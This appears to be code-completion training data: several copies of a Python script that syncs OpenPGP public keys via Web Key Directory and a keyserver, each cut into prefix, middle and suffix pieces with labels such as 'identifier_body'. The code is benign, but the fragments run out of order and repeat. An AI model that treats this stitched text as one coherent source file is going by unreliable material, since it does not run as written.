# Test vector from https://metacode.biz/openpgp/web-key-directory
assert zbase32_encode(hashlib.sha1(b"test-wkd").digest()) == "4hg7tescnttreaouu4z1izeuuyibwww1"
# Test vector from https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
assert (
get_wkd_advanced_url("Joe.Doe@Example.ORG")
== "https://openpgpkey.example.org/.well-known/openpgpkey/example.org/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe" # noqa
)
assert (
get_wkd_direct_url("Joe.Doe@Example.ORG")
== "https://example.org/.well-known/openpgpkey/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe"
)
# Test vector from https://wiki.gnupg.org/WKD
assert (
get_wkd_direct_url("bernhard.reiter@intevation.de")
== "https://intevation.de/.well-known/openpgpkey/hu/it5sewh54rxz33fwmr8u6dy4bbz8itz4?l=bernhard.reiter"
)
def get_pgp_key_id(raw_key: bytes) -> str:
"""Get the identifier of a key, using GnuPG"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
output = subprocess.check_output(
("gpg", "--list-packets"),
input=raw_key,
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
keyid_index = output.index(b"keyid: ") + 7
keyid_end_index = output.index(b"\n", keyid_index)
key_id = output[keyid_index:keyid_end_index].decode("ascii")
assert len(key_id) == 16
assert all(c in "0123456789ABCDEF" for c in key_id)
return key_id
def gpg_recv_key(key_id: str) -> bytes:
"""Receive a key using GnuPG using Ubuntu keyserver https://keyserver.ubuntu.com/"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
with (Path(tmpdir) / "trustdb.gpg").open("wb"):
pass
# Retry several times, as sometimes the command fails with:
# gpg: keyserver receive failed: No data
try_count = 0
while 1:
try:
subprocess.check_output(
("gpg", "--keyserver", "hkps://keyserver.ubuntu.com", "--recv-keys", key_id),
input=b"",
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
break
except subprocess.CalledProcessError:
if try_count >= 10:
raise
print(f"Receiving key {key_id} failed [{try_count}], retrying...")
time.sleep(1)
try_count += 1
raw_key = subprocess.check_output(
("gpg", "--export", key_id),
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
return raw_key
def sync_keys(keys_path: Path) -> None:
"""Sync all the keys and refresh the given file"""
file_lines = []
with keys_path.open("r") as fkeys:
for line in fkeys:
line = line.strip()
if not line or line.startswith("#"):
# Keep comments and empty lines
file_lines.append(line)
continue
fields = line.split(" ")
if len(fields) < 2:
raise ValueError(f"Unexpected line: {line!r}")
current_key_id = fields[0]
email = fields[1]
raw_key = None
wkd_url = None
key_comment = None
if "@" in email:
|
for url in fields[2:]:
# Check URL, and only keep the first valid key
with urllib.request.urlopen(url) as response:
armored_key = response.read()
try:
new_raw_key = unarmor_gpg(armored_key)
except ValueError as exc:
raise ValueError(f"Error in {url!r}: {exc}")
if new_raw_key == b"":
print(f"Downloaded empty key from {url}")
continue
if raw_key is None:
raw_key = new_raw_key
key_comment = url
print(f"Downloaded key from {url}")
# Try using GnuPG directly
if raw_key is None:
raw_key = gpg_recv_key(current_key_id)
key_comment = "received using GnuPG"
# Save the key using the key ID
key_id = get_pgp_key_id(raw_key)
file_name = email.replace("@", "_").replace("+", "_") + "_" + key_id + ".asc"
assert re.match(
r"^[A-Za-z][-0-9A-Za-z._]+$", file_name
), f"Unexpected characters in file name {file_name!r}"
print(f"Saving key for {email!r} in {'all_keys/' + file_name!r}")
b64_key = base64.b64encode(raw_key).decode("ascii")
with (ALL_KEYS_PATH / file_name).open("w") as fkey:
print("-----BEGIN PGP PUBLIC KEY BLOCK-----", file=fkey)
print(f"Comment: {key_comment}", file=fkey)
print("", file=fkey)
for offset in range(0, len(b64_key), 64):
print(b64_key[offset:offset + 64], file=fkey)
print(opgp_crc24_b64(raw_key), file=fkey)
print("-----END PGP PUBLIC KEY BLOCK-----", file=fkey)
# Write the key ID in the file
new_line = f"0x{key_id} {email}"
if len(fields) > 2:
new_line += " " + " ".join(fields[2:])
file_lines.append(new_line)
# Refresh the file
with keys_path.open("w") as fout:
print("\n".join(file_lines), file=fout)
if __name__ == "__main__":
self_check()
sync_keys(KEYS_PATH)
| email = email.lower()
# Download the key using WKD
wkd_url = get_wkd_advanced_url(email)
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url
# Try the direct method when the advanced one failed
# Ignore domains which have issues in their configuration
if raw_key is None and not email.endswith("@att.net"):
wkd_url = get_wkd_direct_url(email)
raw_key = None
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url | conditional_block |
sync_keys.py | #!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# Copyright (c) 2022 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Sync some PGP keys used in widely-used projects
This uses Web Key Directory (WKD) described on:
- https://wiki.gnupg.org/WKD
- https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
For information, to use WKD in the command-line:
gpg --auto-key-locate nodefault,wkd --locate-keys user@example.org
"""
import base64
import hashlib
from pathlib import Path
import re
import subprocess
import sys
import time
import tempfile
from typing import Union
import urllib.error
import urllib.parse
import urllib.request
KEYS_PATH = Path(__file__).parent / "keys.txt"
ALL_KEYS_PATH = Path(__file__).parent / "all_keys"
ZBASE32_ALPHABET = "ybndrfg8ejkmcpqxot1uwisza345h769"
ZBASE32_ALPHABET_REV = {c: i for i, c in enumerate(ZBASE32_ALPHABET)}
def opgp_crc24(data: bytes) -> int:
"""Computes the CRC24 used by OpenPGP Message Format
Specification: https://www.rfc-editor.org/rfc/rfc4880#section-6
#define CRC24_INIT 0xB704CE
#define CRC24_POLY 0x1864CFB
"""
crc = 0xB704CE
for byte in data:
crc ^= byte << 16
for _ in range(8):
crc <<= 1
if (crc & 0x1000000) != 0:
crc ^= 0x1864CFB
assert 0 <= crc <= 0xFFFFFF
return crc
def opgp_crc24_b64(data: bytes) -> str:
"""Computes the CRC24 used by OpenPGP Message Format, encoded in base64"""
crc = opgp_crc24(data)
return "=" + base64.b64encode(crc.to_bytes(3, "big")).decode("ascii")
def unarmor_gpg(armored: Union[bytes, str]) -> bytes:
if isinstance(armored, str):
lines = armored.splitlines()
else:
lines = armored.decode("ascii").splitlines()
if lines[0] != "-----BEGIN PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected first line {lines[0]!r}")
if lines[-1] != "-----END PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected last line {lines[0]!r}")
first_empty_line = lines.index("")
data = base64.b64decode("".join(lines[first_empty_line + 1:-2]))
computed_checksum = opgp_crc24_b64(data)
if lines[-2] != computed_checksum:
raise ValueError(f"unexpected checksum {lines[-2]!r}, expected {computed_checksum}")
return data
def zbase32_encode(data: bytes) -> str:
"""Encode some data using the z-base-32 encoding
This encoding is specified for ZRTP protocol in
https://www.rfc-editor.org/rfc/rfc6189.html#section-5.1.6
and used an alphabet described as:
This base32 encoding scheme differs from RFC 4648, and was designed
(by Bryce Wilcox-O'Hearn) to represent bit sequences in a form that
is convenient for human users to manipulate with minimal ambiguity.
The unusually permuted character ordering was designed for other
applications that use bit sequences that do not end on quintet
boundaries.
This hash is used by WKD and can be computed by GnuPG:
gpg --with-wkd-hash -k yourmail@example.org
"""
result = ""
for idx in range(0, len(data), 5):
result += ZBASE32_ALPHABET[(data[idx] & 0xF8) >> 3]
if idx + 1 == len(data):
result += ZBASE32_ALPHABET[(data[idx] & 0x07) << 2]
break
result += ZBASE32_ALPHABET[((data[idx] & 0x07) << 2) | ((data[idx + 1] & 0xC0) >> 6)]
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x3E) >> 1]
if idx + 2 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x01) << 4]
break
result += ZBASE32_ALPHABET[((data[idx + 1] & 0x01) << 4) | ((data[idx + 2] & 0xF0) >> 4)]
if idx + 3 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 2] & 0x0F) << 1]
break
result += ZBASE32_ALPHABET[((data[idx + 2] & 0x0F) << 1) | ((data[idx + 3] & 0x80) >> 7)]
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x7C) >> 2]
if idx + 4 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x03) << 3]
break
result += ZBASE32_ALPHABET[((data[idx + 3] & 0x03) << 3) | ((data[idx + 4] & 0xE0) >> 5)]
result += ZBASE32_ALPHABET[data[idx + 4] & 0x1F]
assert len(result) == (len(data) * 8 + 4) // 5
return result
def zbase32_decode(text: str) -> bytes:
"""Decode some data using the z-base-32 encoding"""
result = bytearray(len(text) * 5 // 8)
cur_byte = 0
cur_numbits = 0
idx = 0
for character in text:
value = ZBASE32_ALPHABET_REV[character]
cur_byte = (cur_byte << 5) | value
cur_numbits += 5
if cur_numbits >= 8:
cur_numbits -= 8
result[idx] = cur_byte >> cur_numbits
idx += 1
cur_byte &= (1 << cur_numbits) - 1
return bytes(result)
def get_wkd_advanced_url(email: str) -> str:
"""Craft an URL for WKD advanced method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://openpgpkey.{domain}/.well-known/openpgpkey/{domain}/hu/{local_b32}?{params}"
def get_wkd_direct_url(email: str) -> str:
"""Craft an URL for WKD direct method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://{domain}/.well-known/openpgpkey/hu/{local_b32}?{params}"
def | () -> None:
"""Verify that the algorithm computing WKD URLs work"""
assert len(ZBASE32_ALPHABET) == 32
# Test vector from https://github.com/matusf/z-base-32/blob/0.1.2/src/lib.rs
assert zbase32_encode(b"asdasd") == "cf3seamuco"
assert zbase32_decode("cf3seamuco") == b"asdasd"
# Test vector from https://www.uriports.com/blog/setting-up-openpgp-web-key-directory/
# assert zbase32_encode(hashlib.sha1(b"yourmail").digest()) == "hacabazoakmnagxwmkjerb9yehuwehbm"
# -> this hash is wrong, and I don't know what username gives the SHA1
# e61980e2f0c2962c19f45a928207e0472744702b
# Test vector from https://metacode.biz/openpgp/web-key-directory
assert zbase32_encode(hashlib.sha1(b"test-wkd").digest()) == "4hg7tescnttreaouu4z1izeuuyibwww1"
# Test vector from https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
assert (
get_wkd_advanced_url("Joe.Doe@Example.ORG")
== "https://openpgpkey.example.org/.well-known/openpgpkey/example.org/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe" # noqa
)
assert (
get_wkd_direct_url("Joe.Doe@Example.ORG")
== "https://example.org/.well-known/openpgpkey/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe"
)
# Test vector from https://wiki.gnupg.org/WKD
assert (
get_wkd_direct_url("bernhard.reiter@intevation.de")
== "https://intevation.de/.well-known/openpgpkey/hu/it5sewh54rxz33fwmr8u6dy4bbz8itz4?l=bernhard.reiter"
)
def get_pgp_key_id(raw_key: bytes) -> str:
"""Get the identifier of a key, using GnuPG"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
output = subprocess.check_output(
("gpg", "--list-packets"),
input=raw_key,
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
keyid_index = output.index(b"keyid: ") + 7
keyid_end_index = output.index(b"\n", keyid_index)
key_id = output[keyid_index:keyid_end_index].decode("ascii")
assert len(key_id) == 16
assert all(c in "0123456789ABCDEF" for c in key_id)
return key_id
def gpg_recv_key(key_id: str) -> bytes:
"""Receive a key using GnuPG using Ubuntu keyserver https://keyserver.ubuntu.com/"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
with (Path(tmpdir) / "trustdb.gpg").open("wb"):
pass
# Retry several times, as sometimes the command fails with:
# gpg: keyserver receive failed: No data
try_count = 0
while 1:
try:
subprocess.check_output(
("gpg", "--keyserver", "hkps://keyserver.ubuntu.com", "--recv-keys", key_id),
input=b"",
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
break
except subprocess.CalledProcessError:
if try_count >= 10:
raise
print(f"Receiving key {key_id} failed [{try_count}], retrying...")
time.sleep(1)
try_count += 1
raw_key = subprocess.check_output(
("gpg", "--export", key_id),
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
return raw_key
def sync_keys(keys_path: Path) -> None:
"""Sync all the keys and refresh the given file"""
file_lines = []
with keys_path.open("r") as fkeys:
for line in fkeys:
line = line.strip()
if not line or line.startswith("#"):
# Keep comments and empty lines
file_lines.append(line)
continue
fields = line.split(" ")
if len(fields) < 2:
raise ValueError(f"Unexpected line: {line!r}")
current_key_id = fields[0]
email = fields[1]
raw_key = None
wkd_url = None
key_comment = None
if "@" in email:
email = email.lower()
# Download the key using WKD
wkd_url = get_wkd_advanced_url(email)
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url
# Try the direct method when the advanced one failed
# Ignore domains which have issues in their configuration
if raw_key is None and not email.endswith("@att.net"):
wkd_url = get_wkd_direct_url(email)
raw_key = None
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url
for url in fields[2:]:
# Check URL, and only keep the first valid key
with urllib.request.urlopen(url) as response:
armored_key = response.read()
try:
new_raw_key = unarmor_gpg(armored_key)
except ValueError as exc:
raise ValueError(f"Error in {url!r}: {exc}")
if new_raw_key == b"":
print(f"Downloaded empty key from {url}")
continue
if raw_key is None:
raw_key = new_raw_key
key_comment = url
print(f"Downloaded key from {url}")
# Try using GnuPG directly
if raw_key is None:
raw_key = gpg_recv_key(current_key_id)
key_comment = "received using GnuPG"
# Save the key using the key ID
key_id = get_pgp_key_id(raw_key)
file_name = email.replace("@", "_").replace("+", "_") + "_" + key_id + ".asc"
assert re.match(
r"^[A-Za-z][-0-9A-Za-z._]+$", file_name
), f"Unexpected characters in file name {file_name!r}"
print(f"Saving key for {email!r} in {'all_keys/' + file_name!r}")
b64_key = base64.b64encode(raw_key).decode("ascii")
with (ALL_KEYS_PATH / file_name).open("w") as fkey:
print("-----BEGIN PGP PUBLIC KEY BLOCK-----", file=fkey)
print(f"Comment: {key_comment}", file=fkey)
print("", file=fkey)
for offset in range(0, len(b64_key), 64):
print(b64_key[offset:offset + 64], file=fkey)
print(opgp_crc24_b64(raw_key), file=fkey)
print("-----END PGP PUBLIC KEY BLOCK-----", file=fkey)
# Write the key ID in the file
new_line = f"0x{key_id} {email}"
if len(fields) > 2:
new_line += " " + " ".join(fields[2:])
file_lines.append(new_line)
# Refresh the file
with keys_path.open("w") as fout:
print("\n".join(file_lines), file=fout)
if __name__ == "__main__":
self_check()
sync_keys(KEYS_PATH)
| self_check | identifier_name |
sync_keys.py | #!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# Copyright (c) 2022 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Sync some PGP keys used in widely-used projects
This uses Web Key Directory (WKD) described on:
- https://wiki.gnupg.org/WKD
- https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
For information, to use WKD in the command-line:
gpg --auto-key-locate nodefault,wkd --locate-keys user@example.org
"""
import base64
import hashlib
from pathlib import Path
import re
import subprocess
import sys
import time
import tempfile
from typing import Union
import urllib.error
import urllib.parse
import urllib.request
KEYS_PATH = Path(__file__).parent / "keys.txt"
ALL_KEYS_PATH = Path(__file__).parent / "all_keys"
ZBASE32_ALPHABET = "ybndrfg8ejkmcpqxot1uwisza345h769"
ZBASE32_ALPHABET_REV = {c: i for i, c in enumerate(ZBASE32_ALPHABET)}
def opgp_crc24(data: bytes) -> int:
"""Computes the CRC24 used by OpenPGP Message Format
Specification: https://www.rfc-editor.org/rfc/rfc4880#section-6
#define CRC24_INIT 0xB704CE
#define CRC24_POLY 0x1864CFB
"""
crc = 0xB704CE
for byte in data:
crc ^= byte << 16
for _ in range(8):
crc <<= 1
if (crc & 0x1000000) != 0:
crc ^= 0x1864CFB
assert 0 <= crc <= 0xFFFFFF
return crc
def opgp_crc24_b64(data: bytes) -> str:
"""Computes the CRC24 used by OpenPGP Message Format, encoded in base64"""
crc = opgp_crc24(data)
return "=" + base64.b64encode(crc.to_bytes(3, "big")).decode("ascii")
def unarmor_gpg(armored: Union[bytes, str]) -> bytes:
if isinstance(armored, str):
lines = armored.splitlines()
else:
lines = armored.decode("ascii").splitlines()
if lines[0] != "-----BEGIN PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected first line {lines[0]!r}")
if lines[-1] != "-----END PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected last line {lines[0]!r}")
first_empty_line = lines.index("")
data = base64.b64decode("".join(lines[first_empty_line + 1:-2]))
computed_checksum = opgp_crc24_b64(data)
if lines[-2] != computed_checksum:
raise ValueError(f"unexpected checksum {lines[-2]!r}, expected {computed_checksum}")
return data
def zbase32_encode(data: bytes) -> str:
"""Encode some data using the z-base-32 encoding
This encoding is specified for ZRTP protocol in
https://www.rfc-editor.org/rfc/rfc6189.html#section-5.1.6
and used an alphabet described as:
This base32 encoding scheme differs from RFC 4648, and was designed
(by Bryce Wilcox-O'Hearn) to represent bit sequences in a form that
is convenient for human users to manipulate with minimal ambiguity.
The unusually permuted character ordering was designed for other
applications that use bit sequences that do not end on quintet
boundaries.
This hash is used by WKD and can be computed by GnuPG:
gpg --with-wkd-hash -k yourmail@example.org
"""
result = ""
for idx in range(0, len(data), 5):
result += ZBASE32_ALPHABET[(data[idx] & 0xF8) >> 3]
if idx + 1 == len(data):
result += ZBASE32_ALPHABET[(data[idx] & 0x07) << 2]
break
result += ZBASE32_ALPHABET[((data[idx] & 0x07) << 2) | ((data[idx + 1] & 0xC0) >> 6)]
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x3E) >> 1]
if idx + 2 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x01) << 4]
break
result += ZBASE32_ALPHABET[((data[idx + 1] & 0x01) << 4) | ((data[idx + 2] & 0xF0) >> 4)]
if idx + 3 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 2] & 0x0F) << 1]
break
result += ZBASE32_ALPHABET[((data[idx + 2] & 0x0F) << 1) | ((data[idx + 3] & 0x80) >> 7)]
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x7C) >> 2]
if idx + 4 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x03) << 3]
break
result += ZBASE32_ALPHABET[((data[idx + 3] & 0x03) << 3) | ((data[idx + 4] & 0xE0) >> 5)]
result += ZBASE32_ALPHABET[data[idx + 4] & 0x1F]
assert len(result) == (len(data) * 8 + 4) // 5
return result
def zbase32_decode(text: str) -> bytes:
"""Decode some data using the z-base-32 encoding"""
result = bytearray(len(text) * 5 // 8)
cur_byte = 0
cur_numbits = 0
idx = 0
for character in text:
value = ZBASE32_ALPHABET_REV[character]
cur_byte = (cur_byte << 5) | value
cur_numbits += 5
if cur_numbits >= 8:
cur_numbits -= 8
result[idx] = cur_byte >> cur_numbits
idx += 1
cur_byte &= (1 << cur_numbits) - 1
return bytes(result)
def get_wkd_advanced_url(email: str) -> str:
"""Craft an URL for WKD advanced method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://openpgpkey.{domain}/.well-known/openpgpkey/{domain}/hu/{local_b32}?{params}"
def get_wkd_direct_url(email: str) -> str:
"""Craft an URL for WKD direct method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://{domain}/.well-known/openpgpkey/hu/{local_b32}?{params}"
def self_check() -> None:
"""Verify that the algorithm computing WKD URLs work"""
assert len(ZBASE32_ALPHABET) == 32
# Test vector from https://github.com/matusf/z-base-32/blob/0.1.2/src/lib.rs
assert zbase32_encode(b"asdasd") == "cf3seamuco"
assert zbase32_decode("cf3seamuco") == b"asdasd"
# Test vector from https://www.uriports.com/blog/setting-up-openpgp-web-key-directory/
# assert zbase32_encode(hashlib.sha1(b"yourmail").digest()) == "hacabazoakmnagxwmkjerb9yehuwehbm"
# -> this hash is wrong, and I don't know what username gives the SHA1
# e61980e2f0c2962c19f45a928207e0472744702b
# Test vector from https://metacode.biz/openpgp/web-key-directory
assert zbase32_encode(hashlib.sha1(b"test-wkd").digest()) == "4hg7tescnttreaouu4z1izeuuyibwww1"
# Test vector from https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
assert (
get_wkd_advanced_url("Joe.Doe@Example.ORG")
== "https://openpgpkey.example.org/.well-known/openpgpkey/example.org/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe" # noqa
)
assert (
get_wkd_direct_url("Joe.Doe@Example.ORG")
== "https://example.org/.well-known/openpgpkey/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe"
)
# Test vector from https://wiki.gnupg.org/WKD
assert (
get_wkd_direct_url("bernhard.reiter@intevation.de")
== "https://intevation.de/.well-known/openpgpkey/hu/it5sewh54rxz33fwmr8u6dy4bbz8itz4?l=bernhard.reiter"
)
def get_pgp_key_id(raw_key: bytes) -> str:
"""Get the identifier of a key, using GnuPG"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
output = subprocess.check_output(
("gpg", "--list-packets"),
input=raw_key,
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
keyid_index = output.index(b"keyid: ") + 7
keyid_end_index = output.index(b"\n", keyid_index)
key_id = output[keyid_index:keyid_end_index].decode("ascii")
assert len(key_id) == 16
assert all(c in "0123456789ABCDEF" for c in key_id)
return key_id
def gpg_recv_key(key_id: str) -> bytes:
"""Receive a key using GnuPG using Ubuntu keyserver https://keyserver.ubuntu.com/"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
with (Path(tmpdir) / "trustdb.gpg").open("wb"):
pass
# Retry several times, as sometimes the command fails with:
# gpg: keyserver receive failed: No data
try_count = 0
while 1:
try:
subprocess.check_output(
("gpg", "--keyserver", "hkps://keyserver.ubuntu.com", "--recv-keys", key_id),
input=b"",
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
break
except subprocess.CalledProcessError:
if try_count >= 10:
raise
print(f"Receiving key {key_id} failed [{try_count}], retrying...")
time.sleep(1)
try_count += 1
raw_key = subprocess.check_output(
("gpg", "--export", key_id),
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
return raw_key
def sync_keys(keys_path: Path) -> None:
|
if __name__ == "__main__":
self_check()
sync_keys(KEYS_PATH)
| """Sync all the keys and refresh the given file"""
file_lines = []
with keys_path.open("r") as fkeys:
for line in fkeys:
line = line.strip()
if not line or line.startswith("#"):
# Keep comments and empty lines
file_lines.append(line)
continue
fields = line.split(" ")
if len(fields) < 2:
raise ValueError(f"Unexpected line: {line!r}")
current_key_id = fields[0]
email = fields[1]
raw_key = None
wkd_url = None
key_comment = None
if "@" in email:
email = email.lower()
# Download the key using WKD
wkd_url = get_wkd_advanced_url(email)
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url
# Try the direct method when the advanced one failed
# Ignore domains which have issues in their configuration
if raw_key is None and not email.endswith("@att.net"):
wkd_url = get_wkd_direct_url(email)
raw_key = None
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url
for url in fields[2:]:
# Check URL, and only keep the first valid key
with urllib.request.urlopen(url) as response:
armored_key = response.read()
try:
new_raw_key = unarmor_gpg(armored_key)
except ValueError as exc:
raise ValueError(f"Error in {url!r}: {exc}")
if new_raw_key == b"":
print(f"Downloaded empty key from {url}")
continue
if raw_key is None:
raw_key = new_raw_key
key_comment = url
print(f"Downloaded key from {url}")
# Try using GnuPG directly
if raw_key is None:
raw_key = gpg_recv_key(current_key_id)
key_comment = "received using GnuPG"
# Save the key using the key ID
key_id = get_pgp_key_id(raw_key)
file_name = email.replace("@", "_").replace("+", "_") + "_" + key_id + ".asc"
assert re.match(
r"^[A-Za-z][-0-9A-Za-z._]+$", file_name
), f"Unexpected characters in file name {file_name!r}"
print(f"Saving key for {email!r} in {'all_keys/' + file_name!r}")
b64_key = base64.b64encode(raw_key).decode("ascii")
with (ALL_KEYS_PATH / file_name).open("w") as fkey:
print("-----BEGIN PGP PUBLIC KEY BLOCK-----", file=fkey)
print(f"Comment: {key_comment}", file=fkey)
print("", file=fkey)
for offset in range(0, len(b64_key), 64):
print(b64_key[offset:offset + 64], file=fkey)
print(opgp_crc24_b64(raw_key), file=fkey)
print("-----END PGP PUBLIC KEY BLOCK-----", file=fkey)
# Write the key ID in the file
new_line = f"0x{key_id} {email}"
if len(fields) > 2:
new_line += " " + " ".join(fields[2:])
file_lines.append(new_line)
# Refresh the file
with keys_path.open("w") as fout:
print("\n".join(file_lines), file=fout) | identifier_body |
sync_keys.py | #!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# Copyright (c) 2022 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
